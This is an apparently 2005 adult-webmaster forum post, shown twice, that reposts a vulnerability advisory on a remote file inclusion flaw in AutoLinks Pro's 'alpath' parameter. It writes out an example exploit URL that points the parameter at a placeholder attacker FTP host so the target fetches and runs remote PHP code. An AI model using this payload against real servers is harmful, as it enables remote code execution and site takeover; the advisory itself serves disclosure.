GoFuckYourself.com - Adult Webmaster Forum - View Single Post - Autolinks Pro hacked

stevo · 09-04-2005, 01:48 PM

Description: A vulnerability was reported in AutoLinks Pro. A remote user can execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'alpath' parameter. If register_globals is set to 'on' in the 'php.ini' configuration file, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The flaw resides in 'autolinks/al_initialize.php'.

http://[target]/al_initialize.php?alpath=ftp://[attacker]/

The above URL will cause the PHP code in the 'al_functions.php' file on the 'attacker' FTP site to be executed on the target system.

Whats your website?

09-04-2005, 01:48 PM
stevo Confirmed User Join Date: Aug 2002 Location: Orlando, Florida Posts: 2,051	Description: A vulnerability was reported in AutoLinks Pro. A remote user can execute arbitrary code on the target system. The software does not properly validate user-supplied input in the 'alpath' parameter. If register_globals is set to 'on' in the 'php.ini' configuration file, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service. The flaw resides in 'autolinks/al_initialize.php'. http://[target]/al_initialize.php?alpath=ftp://[attacker]/ The above URL will cause the PHP code in the 'al_functions.php' file on the 'attacker' FTP site to be executed on the target system. Whats your website? Last edited by stevo; 09-04-2005 at 01:50 PM..